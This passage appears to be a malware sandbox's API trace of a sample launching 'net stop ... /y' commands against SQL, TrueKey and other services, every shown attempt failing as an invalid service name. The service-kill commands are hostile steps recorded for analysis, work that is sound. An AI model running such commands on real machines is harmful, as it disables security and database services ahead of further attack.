1 [0040.806] NetServiceControl (in: servername=0x0, service="MSOLAP$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x25fc40 | out: bufptr=0x25fc40) returned 0x889 [0040.807] wcscpy_s (in: _Destination=0xeaa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0040.807] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0040.808] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xeab338, nSize=0x800, Arguments=0xea9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0040.809] GetFileType (hFile=0x26c) returned 0x3 [0040.809] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5d3f90 [0040.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5d3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0040.809] WriteFile (in: hFile=0x26c, lpBuffer=0x5d3f90*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x25fb80, lpOverlapped=0x0 | out: lpBuffer=0x5d3f90*, lpNumberOfBytesWritten=0x25fb80*=0x1e, lpOverlapped=0x0) returned 1 [0040.809] LocalFree (hMem=0x5d3f90) returned 0x0 [0040.809] GetFileType (hFile=0x26c) returned 0x3 [0040.809] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5d6238 [0040.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5d6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n]", lpUsedDefaultChar=0x0) returned 2 [0040.809] WriteFile (in: hFile=0x26c, lpBuffer=0x5d6238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25fb80, lpOverlapped=0x0 | out: lpBuffer=0x5d6238*, lpNumberOfBytesWritten=0x25fb80*=0x2, lpOverlapped=0x0) returned 1 [0040.809] LocalFree (hMem=0x5d6238) returned 0x0 [0040.809] _ultow (in: _Dest=0x889, _Radix=2489264 | out: _Dest=0x889) returned="2185" [0040.809] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xeab338, nSize=0x800, Arguments=0xea9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0040.809] GetFileType (hFile=0x26c) returned 0x3 [0040.809] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5d6238 [0040.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5d6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0040.809] WriteFile (in: hFile=0x26c, lpBuffer=0x5d6238*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x25fb8c, lpOverlapped=0x0 | out: lpBuffer=0x5d6238*, lpNumberOfBytesWritten=0x25fb8c*=0x34, lpOverlapped=0x0) returned 1 [0040.810] LocalFree (hMem=0x5d6238) returned 0x0 [0040.810] GetFileType (hFile=0x26c) returned 0x3 [0040.810] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5d6238 [0040.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5d6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n]", lpUsedDefaultChar=0x0) returned 2 [0040.810] WriteFile (in: hFile=0x26c, lpBuffer=0x5d6238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25fb8c, lpOverlapped=0x0 | out: lpBuffer=0x5d6238*, lpNumberOfBytesWritten=0x25fb8c*=0x2, lpOverlapped=0x0) returned 1 [0040.810] LocalFree (hMem=0x5d6238) returned 0x0 [0040.810] NetApiBufferFree (Buffer=0x5d1c78) returned 0x0 [0040.810] NetApiBufferFree (Buffer=0x5d1c90) returned 0x0 [0040.810] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" [0040.810] exit (_Code=2) Process: id = "55" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4885f000" os_pid = "0x7a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop TrueKeyServiceHelper /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 123 os_tid = 0x824 Process: id = "56" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x49276000" os_pid = "0x6f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "55" os_parent_pid = "0x7a4" cmd_line = "C:\\Windows\\system32\\net1 stop TrueKeyServiceHelper /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 124 os_tid = 0x5b4 [0041.030] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fcd8 | out: lpSystemTimeAsFileTime=0x18fcd8*(dwLowDateTime=0xe2a79ee0, dwHighDateTime=0x1d57a86)) [0041.030] GetCurrentProcessId () returned 0x6f4 [0041.030] GetCurrentThreadId () returned 0x5b4 [0041.030] GetTickCount () returned 0x11453fa [0041.030] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcd0 | out: lpPerformanceCount=0x18fcd0*=16131451588) returned 1 [0041.030] GetModuleHandleA (lpModuleName=0x0) returned 0x5d0000 [0041.030] __set_app_type (_Type=0x1) [0041.030] __p__fmode () returned 0x74eb31f4 [0041.030] __p__commode () returned 0x74eb31fc [0041.030] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x5dffe6) returned 0x0 [0041.031] __getmainargs (in: _Argc=0x5e9064, _Argv=0x5e906c, _Env=0x5e9068, _DoWildCard=0, _StartInfo=0x5e9024 | out: _Argc=0x5e9064, _Argv=0x5e906c, _Env=0x5e9068) returned 0 [0041.031] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0041.031] GetConsoleOutputCP () returned 0x1b5 [0041.031] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x5e9080 | out: lpCPInfo=0x5e9080) returned 1 [0041.031] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.034] sprintf_s (in: _DstBuf=0x18fc90, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0041.034] setlocale (category=0, locale=".437") returned="English_United States.437" [0041.036] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0041.036] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0041.036] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKeyServiceHelper /y" [0041.036] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fa5c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0041.036] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x7c) returned 0x203c20 [0041.036] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0041.037] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fc60 | out: Buffer=0x18fc60*=0x201c80) returned 0x0 [0041.037] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fc60 | out: Buffer=0x18fc60*=0x201c98) returned 0x0 [0041.037] _fileno (_File=0x74eb2900) returned -2 [0041.037] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0041.037] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0041.037] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0041.037] _wcsicmp (_String1="config", _String2="stop") returned -16 [0041.037] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0041.037] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0041.037] _wcsicmp (_String1="file", _String2="stop") returned -13 [0041.037] _wcsicmp (_String1="files", _String2="stop") returned -13 [0041.037] _wcsicmp (_String1="group", _String2="stop") returned -12 [0041.037] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0041.037] _wcsicmp (_String1="help", _String2="stop") returned -11 [0041.037] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0041.037] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0041.037] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0041.037] _wcsicmp (_String1="session", _String2="stop") returned -15 [0041.037] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0041.037] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0041.037] _wcsicmp (_String1="share", _String2="stop") returned -12 [0041.037] _wcsicmp (_String1="start", _String2="stop") returned -14 [0041.037] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0041.037] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0041.037] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0041.037] _wcsicmp (_String1="accounts", _String2="TrueKeyServiceHelper") returned -19 [0041.037] _wcsicmp (_String1="computer", _String2="TrueKeyServiceHelper") returned -17 [0041.037] _wcsicmp (_String1="config", _String2="TrueKeyServiceHelper") returned -17 [0041.037] _wcsicmp (_String1="continue", _String2="TrueKeyServiceHelper") returned -17 [0041.037] _wcsicmp (_String1="cont", _String2="TrueKeyServiceHelper") returned -17 [0041.038] _wcsicmp (_String1="file", _String2="TrueKeyServiceHelper") returned -14 [0041.038] _wcsicmp (_String1="files", _String2="TrueKeyServiceHelper") returned -14 [0041.038] _wcsicmp (_String1="group", _String2="TrueKeyServiceHelper") returned -13 [0041.038] _wcsicmp (_String1="groups", _String2="TrueKeyServiceHelper") returned -13 [0041.038] _wcsicmp (_String1="help", _String2="TrueKeyServiceHelper") returned -12 [0041.038] _wcsicmp (_String1="helpmsg", _String2="TrueKeyServiceHelper") returned -12 [0041.038] _wcsicmp (_String1="localgroup", _String2="TrueKeyServiceHelper") returned -8 [0041.038] _wcsicmp (_String1="pause", _String2="TrueKeyServiceHelper") returned -4 [0041.038] _wcsicmp (_String1="session", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="sessions", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="sess", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="share", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="start", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="stats", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="statistics", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="stop", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="time", _String2="TrueKeyServiceHelper") returned -9 [0041.038] _wcsicmp (_String1="user", _String2="TrueKeyServiceHelper") returned 1 [0041.038] _wcsicmp (_String1="users", _String2="TrueKeyServiceHelper") returned 1 [0041.038] _wcsicmp (_String1="msg", _String2="TrueKeyServiceHelper") returned -7 [0041.038] _wcsicmp (_String1="messenger", _String2="TrueKeyServiceHelper") returned -7 [0041.038] _wcsicmp (_String1="receiver", _String2="TrueKeyServiceHelper") returned -2 [0041.038] _wcsicmp (_String1="rcv", _String2="TrueKeyServiceHelper") returned -2 [0041.038] _wcsicmp (_String1="netpopup", _String2="TrueKeyServiceHelper") returned -6 [0041.038] _wcsicmp (_String1="redirector", _String2="TrueKeyServiceHelper") returned -2 [0041.038] _wcsicmp (_String1="redir", _String2="TrueKeyServiceHelper") returned -2 [0041.038] _wcsicmp (_String1="rdr", _String2="TrueKeyServiceHelper") returned -2 [0041.038] _wcsicmp (_String1="workstation", _String2="TrueKeyServiceHelper") returned 3 [0041.038] _wcsicmp (_String1="work", _String2="TrueKeyServiceHelper") returned 3 [0041.038] _wcsicmp (_String1="wksta", _String2="TrueKeyServiceHelper") returned 3 [0041.038] _wcsicmp (_String1="prdr", _String2="TrueKeyServiceHelper") returned -4 [0041.038] _wcsicmp (_String1="devrdr", _String2="TrueKeyServiceHelper") returned -16 [0041.038] _wcsicmp (_String1="lanmanworkstation", _String2="TrueKeyServiceHelper") returned -8 [0041.038] _wcsicmp (_String1="server", _String2="TrueKeyServiceHelper") returned -1 [0041.038] _wcsicmp (_String1="svr", _String2="TrueKeyServiceHelper") returned -1 [0041.039] _wcsicmp (_String1="srv", _String2="TrueKeyServiceHelper") returned -1 [0041.039] _wcsicmp (_String1="lanmanserver", _String2="TrueKeyServiceHelper") returned -8 [0041.039] _wcsicmp (_String1="alerter", _String2="TrueKeyServiceHelper") returned -19 [0041.039] _wcsicmp (_String1="netlogon", _String2="TrueKeyServiceHelper") returned -6 [0041.039] _wcsupr (in: _String="TrueKeyServiceHelper" | out: _String="TRUEKEYSERVICEHELPER") returned="TRUEKEYSERVICEHELPER" [0041.039] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2054f0 [0041.041] GetServiceKeyNameW (in: hSCManager=0x2054f0, lpDisplayName="TRUEKEYSERVICEHELPER", lpServiceName=0x5eaaf0, lpcchBuffer=0x18fbfc | out: lpServiceName="", lpcchBuffer=0x18fbfc) returned 0 [0041.042] _wcsicmp (_String1="msg", _String2="TRUEKEYSERVICEHELPER") returned -7 [0041.042] _wcsicmp (_String1="messenger", _String2="TRUEKEYSERVICEHELPER") returned -7 [0041.042] _wcsicmp (_String1="receiver", _String2="TRUEKEYSERVICEHELPER") returned -2 [0041.042] _wcsicmp (_String1="rcv", _String2="TRUEKEYSERVICEHELPER") returned -2 [0041.042] _wcsicmp (_String1="redirector", _String2="TRUEKEYSERVICEHELPER") returned -2 [0041.042] _wcsicmp (_String1="redir", _String2="TRUEKEYSERVICEHELPER") returned -2 [0041.042] _wcsicmp (_String1="rdr", _String2="TRUEKEYSERVICEHELPER") returned -2 [0041.042] _wcsicmp (_String1="workstation", _String2="TRUEKEYSERVICEHELPER") returned 3 [0041.042] _wcsicmp (_String1="work", _String2="TRUEKEYSERVICEHELPER") returned 3 [0041.042] _wcsicmp (_String1="wksta", _String2="TRUEKEYSERVICEHELPER") returned 3 [0041.042] _wcsicmp (_String1="prdr", _String2="TRUEKEYSERVICEHELPER") returned -4 [0041.042] _wcsicmp (_String1="devrdr", _String2="TRUEKEYSERVICEHELPER") returned -16 [0041.042] _wcsicmp (_String1="lanmanworkstation", _String2="TRUEKEYSERVICEHELPER") returned -8 [0041.042] _wcsicmp (_String1="server", _String2="TRUEKEYSERVICEHELPER") returned -1 [0041.042] _wcsicmp (_String1="svr", _String2="TRUEKEYSERVICEHELPER") returned -1 [0041.042] _wcsicmp (_String1="srv", _String2="TRUEKEYSERVICEHELPER") returned -1 [0041.042] _wcsicmp (_String1="lanmanserver", _String2="TRUEKEYSERVICEHELPER") returned -8 [0041.042] _wcsicmp (_String1="alerter", _String2="TRUEKEYSERVICEHELPER") returned -19 [0041.042] _wcsicmp (_String1="netlogon", _String2="TRUEKEYSERVICEHELPER") returned -6 [0041.042] NetServiceControl (in: servername=0x0, service="TRUEKEYSERVICEHELPER", opcode=0x0, arg=0x0, bufptr=0x18fbf8 | out: bufptr=0x18fbf8) returned 0x889 [0041.043] wcscpy_s (in: _Destination=0x5ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0041.043] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0041.044] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x5eb338, nSize=0x800, Arguments=0x5e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0041.045] GetFileType (hFile=0x26c) returned 0x3 [0041.045] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x204020 [0041.045] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x204020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n\x1f", lpUsedDefaultChar=0x0) returned 30 [0041.045] WriteFile (in: hFile=0x26c, lpBuffer=0x204020*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x18fb38, lpOverlapped=0x0 | out: lpBuffer=0x204020*, lpNumberOfBytesWritten=0x18fb38*=0x1e, lpOverlapped=0x0) returned 1 [0041.045] LocalFree (hMem=0x204020) returned 0x0 [0041.045] GetFileType (hFile=0x26c) returned 0x3 [0041.045] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2062c8 [0041.045] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2062c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n ", lpUsedDefaultChar=0x0) returned 2 [0041.045] WriteFile (in: hFile=0x26c, lpBuffer=0x2062c8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18fb38, lpOverlapped=0x0 | out: lpBuffer=0x2062c8*, lpNumberOfBytesWritten=0x18fb38*=0x2, lpOverlapped=0x0) returned 1 [0041.045] LocalFree (hMem=0x2062c8) returned 0x0 [0041.045] _ultow (in: _Dest=0x889, _Radix=1637224 | out: _Dest=0x889) returned="2185" [0041.045] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x5eb338, nSize=0x800, Arguments=0x5e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0041.045] GetFileType (hFile=0x26c) returned 0x3 [0041.045] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2062c8 [0041.046] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2062c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0041.046] WriteFile (in: hFile=0x26c, lpBuffer=0x2062c8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x18fb44, lpOverlapped=0x0 | out: lpBuffer=0x2062c8*, lpNumberOfBytesWritten=0x18fb44*=0x34, lpOverlapped=0x0) returned 1 [0041.046] LocalFree (hMem=0x2062c8) returned 0x0 [0041.046] GetFileType (hFile=0x26c) returned 0x3 [0041.046] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2062c8 [0041.046] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2062c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n ", lpUsedDefaultChar=0x0) returned 2 [0041.046] WriteFile (in: hFile=0x26c, lpBuffer=0x2062c8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18fb44, lpOverlapped=0x0 | out: lpBuffer=0x2062c8*, lpNumberOfBytesWritten=0x18fb44*=0x2, lpOverlapped=0x0) returned 1 [0041.046] LocalFree (hMem=0x2062c8) returned 0x0 [0041.046] NetApiBufferFree (Buffer=0x201c80) returned 0x0 [0041.046] NetApiBufferFree (Buffer=0x201c98) returned 0x0 [0041.046] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKeyServiceHelper /y" [0041.046] exit (_Code=2) Process: id = "57" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47d64000" os_pid = "0x7cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop sacsvr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 125 os_tid = 0x644 Process: id = "58" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x48cd6000" os_pid = "0x5e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "57" os_parent_pid = "0x7cc" cmd_line = "C:\\Windows\\system32\\net1 stop sacsvr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 126 os_tid = 0x6fc [0041.361] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef9d8 | out: lpSystemTimeAsFileTime=0xef9d8*(dwLowDateTime=0xe2dbfd20, dwHighDateTime=0x1d57a86)) [0041.361] GetCurrentProcessId () returned 0x5e4 [0041.361] GetCurrentThreadId () returned 0x6fc [0041.361] GetTickCount () returned 0x1145551 [0041.361] QueryPerformanceCounter (in: lpPerformanceCount=0xef9d0 | out: lpPerformanceCount=0xef9d0*=16164533150) returned 1 [0041.361] GetModuleHandleA (lpModuleName=0x0) returned 0x910000 [0041.361] __set_app_type (_Type=0x1) [0041.361] __p__fmode () returned 0x74eb31f4 [0041.361] __p__commode () returned 0x74eb31fc [0041.361] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x91ffe6) returned 0x0 [0041.361] __getmainargs (in: _Argc=0x929064, _Argv=0x92906c, _Env=0x929068, _DoWildCard=0, _StartInfo=0x929024 | out: _Argc=0x929064, _Argv=0x92906c, _Env=0x929068) returned 0 [0041.361] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0041.361] GetConsoleOutputCP () returned 0x1b5 [0041.362] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x929080 | out: lpCPInfo=0x929080) returned 1 [0041.362] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.364] sprintf_s (in: _DstBuf=0xef990, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0041.365] setlocale (category=0, locale=".437") returned="English_United States.437" [0041.367] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0041.367] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0041.367] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sacsvr /y" [0041.367] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef75c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0041.367] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x403c00 [0041.367] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0041.367] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xef960 | out: Buffer=0xef960*=0x401c60) returned 0x0 [0041.367] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xef960 | out: Buffer=0xef960*=0x401c78) returned 0x0 [0041.367] _fileno (_File=0x74eb2900) returned -2 [0041.367] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0041.367] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0041.367] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0041.367] _wcsicmp (_String1="config", _String2="stop") returned -16 [0041.367] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0041.367] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0041.367] _wcsicmp (_String1="file", _String2="stop") returned -13 [0041.367] _wcsicmp (_String1="files", _String2="stop") returned -13 [0041.368] _wcsicmp (_String1="group", _String2="stop") returned -12 [0041.368] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0041.368] _wcsicmp (_String1="help", _String2="stop") returned -11 [0041.368] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0041.368] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0041.368] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0041.368] _wcsicmp (_String1="session", _String2="stop") returned -15 [0041.368] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0041.368] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0041.368] _wcsicmp (_String1="share", _String2="stop") returned -12 [0041.368] _wcsicmp (_String1="start", _String2="stop") returned -14 [0041.368] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0041.368] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0041.368] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0041.368] _wcsicmp (_String1="accounts", _String2="sacsvr") returned -18 [0041.368] _wcsicmp (_String1="computer", _String2="sacsvr") returned -16 [0041.368] _wcsicmp (_String1="config", _String2="sacsvr") returned -16 [0041.368] _wcsicmp (_String1="continue", _String2="sacsvr") returned -16 [0041.368] _wcsicmp (_String1="cont", _String2="sacsvr") returned -16 [0041.368] _wcsicmp (_String1="file", _String2="sacsvr") returned -13 [0041.368] _wcsicmp (_String1="files", _String2="sacsvr") returned -13 [0041.368] _wcsicmp (_String1="group", _String2="sacsvr") returned -12 [0041.368] _wcsicmp (_String1="groups", _String2="sacsvr") returned -12 [0041.368] _wcsicmp (_String1="help", _String2="sacsvr") returned -11 [0041.368] _wcsicmp (_String1="helpmsg", _String2="sacsvr") returned -11 [0041.368] _wcsicmp (_String1="localgroup", _String2="sacsvr") returned -7 [0041.368] _wcsicmp (_String1="pause", _String2="sacsvr") returned -3 [0041.368] _wcsicmp (_String1="session", _String2="sacsvr") returned 4 [0041.368] _wcsicmp (_String1="sessions", _String2="sacsvr") returned 4 [0041.368] _wcsicmp (_String1="sess", _String2="sacsvr") returned 4 [0041.368] _wcsicmp (_String1="share", _String2="sacsvr") returned 7 [0041.368] _wcsicmp (_String1="start", _String2="sacsvr") returned 19 [0041.368] _wcsicmp (_String1="stats", _String2="sacsvr") returned 19 [0041.368] _wcsicmp (_String1="statistics", _String2="sacsvr") returned 19 [0041.368] _wcsicmp (_String1="stop", _String2="sacsvr") returned 19 [0041.369] _wcsicmp (_String1="time", _String2="sacsvr") returned 1 [0041.369] _wcsicmp (_String1="user", _String2="sacsvr") returned 2 [0041.369] _wcsicmp (_String1="users", _String2="sacsvr") returned 2 [0041.369] _wcsicmp (_String1="msg", _String2="sacsvr") returned -6 [0041.369] _wcsicmp (_String1="messenger", _String2="sacsvr") returned -6 [0041.369] _wcsicmp (_String1="receiver", _String2="sacsvr") returned -1 [0041.369] _wcsicmp (_String1="rcv", _String2="sacsvr") returned -1 [0041.369] _wcsicmp (_String1="netpopup", _String2="sacsvr") returned -5 [0041.369] _wcsicmp (_String1="redirector", _String2="sacsvr") returned -1 [0041.369] _wcsicmp (_String1="redir", _String2="sacsvr") returned -1 [0041.369] _wcsicmp (_String1="rdr", _String2="sacsvr") returned -1 [0041.369] _wcsicmp 